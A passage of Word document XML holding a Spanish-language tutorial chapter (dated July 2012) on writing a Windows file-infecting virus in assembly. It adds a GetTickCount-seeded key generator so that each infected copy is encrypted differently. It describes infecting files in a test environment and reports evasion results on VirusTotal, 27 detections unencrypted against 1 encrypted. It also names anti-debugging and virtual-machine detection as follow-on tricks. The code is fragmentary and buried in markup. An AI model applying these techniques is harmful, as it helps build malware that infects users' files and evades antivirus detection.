        <w:t>) ya que la secuencia que genera es muy buena. Después vamos a ver como variar la semilla para que los números creados sean má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Volvamos al código y creemos un procedimiento que me devuelva el próximo número de la secuencia. Además vamos crear una variable que llamaremos semilla y la vamos a generar aleatoriamente utilizando la función GetTickCount de la librería kernel32.dll, que me devuelve en el registro EAX el número de milisegundos que han transcurrido desde que se inició Window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poder contar con esta función, vamos a tener que agregarlas en el listado de APIs que averigua el programa, para esto tenemos cambiar la variable zAPIs y agregarl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zAPIs           db "FindFirs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FindNex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Mapping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loseHand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Un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b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>db "GetTickCount",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b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definir una variable para almacenar su dirección de memoria y otra para la semi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GetTickCount   dd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milla              dd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ya tenemos todo listo para armar el procedimiento que me genera la clave en forma aleatoria, quedaría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pro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est    </w:t>
        <w:tab/>
        <w:t>eax, ea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nz     </w:t>
        <w:tab/>
        <w:t>semillaOK</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ebp + offset zGetTickCoun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nd     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">eax, 0FFh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emillaOK:</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dx, 05h</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ul</w:t>
        <w:tab/>
        <w:t>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w:t>
        <w:tab/>
        <w:t>eax, 03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w:t>
        <w:tab/>
        <w:t>ebx, 020h</w:t>
        <w:tab/>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w:t>
        <w:tab/>
        <w:t>edx, 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div       </w:t>
        <w:tab/>
        <w:t>ebx</w:t>
        <w:tab/>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dx                           ; toma el resto de la división</w:t>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          ; guarda la semilla para la próxima corrid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end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amos esto detenid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 xml:space="preserve">Lo primero que hacemos es chequear si la semilla está en cero, en cuyo caso utilizamos la función GetTickCount() para cargar un número aleatorio en EAX, y luego le hacemos un and con 0FFh para descartar los primeros bits (esto mismo utilizamos cuando vimos la rutina para </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>encontrar la dirección del kerne32.dll en el capítulo 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
        <w:b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Luego multiplicamos este valor por 5 y le sumamos 3, y por último lo dividimos por 20h (32 en decimal) y tomamos el resto de esta división.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="0"/>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Por último guardamos el valor generado en la variable semilla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 bastante simple, solamente voy a aclarar el tema de la división, ya que si no conocen su funcionamiento no van a entender por qué lo hacemos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uando hacemos ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>div ebx’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en realidad el SO hace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Dividendo   </w:t>
        <w:tab/>
        <w:t>Divisor        Cociente    R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DX:EAX       </w:t>
        <w:tab/>
        <w:t>EBX            EAX           ED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eso tomamos el resto (EDX) que es justamente el valor que nos interesa, y luego lo pasamos a EAX para devolver el valor y también para guardarlo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llamar a este procedimiento antes de cada copia del virus, para eso antes de la rutina de copia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generaclave</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byte ptr [ebp + offset clave], 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lo cual estamos generando un nuevo número aleatorio y pasándolo a la variable clave para encriptar luego el código a copiar. Además como también vamos a copiar ese valor, la clave va a ir dentro del virus para poder utilizarla luego en la decodifica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obemos esto, compilemos el virus y ejecutémoslo dentro de nuestro entorno de prueba, con lo cual infectará los tres primeros archivos que encuentre. Ahora abramos cada uno con el OllyDbg y veamos su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1:</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1375" cy="255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1" r="-6" b="-11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="465137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2:</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0105" cy="255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465010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3:</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17720" cy="2541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1" r="-6" b="-11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4617720" cy="254127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para cada infección cambia la clave de encriptación: 10, 13 y 02. Con lo cual también cambia el código del virus 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sta técnica no es suficiente para engañar un antivirus, ya que éstos poseen técnicas heurísticas que pueden realizar un análisis dinámico o emular la ejecución de los archivos para descubrir lo que este hace. De todas formas probemos si logramos engañar a alguno de ellos. Subamos una muestra normal del virus y una encriptada a VirusTotal (www.virustotal.com) para ver que pas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normal:</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8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4" r="-4" b="-14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5552440" cy="15868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encriptado:</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72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4" r="-4" b="-14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5552440" cy="157289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vemos que pudimos engañar a varios, ya que sin encriptar lo detectan 27 antivirus y encriptado sólo 1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ventaja de esta técnica es que si alguien está analizando una muestra de nuestro virus, no va a poder realizar un análisis estático del mismo, y tendrá que ejecutarlo para poder ver que hace, con lo cual tendremos una gran ventaja porque podremos utilizar rutinas anti-debugging, detectar si se ejecuta en una máquina virtual,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por último, también dificultaremos la creación de un string de reconocimiento, o sea una firma válida para reconocerlo, ya que la única parte invariable del virus es solamente su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conclusión, esta técnica por sí sola no es suficiente para proteger nuestro espécimen, pero combinada con otras puede ser muy pot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vanish/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Julio 2012</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_PictureBullets"/>
      <w:bookmarkEnd w:id="0"/>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7-08T18:57:00Z</dcterms:modified>
  <cp:revision>3105</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>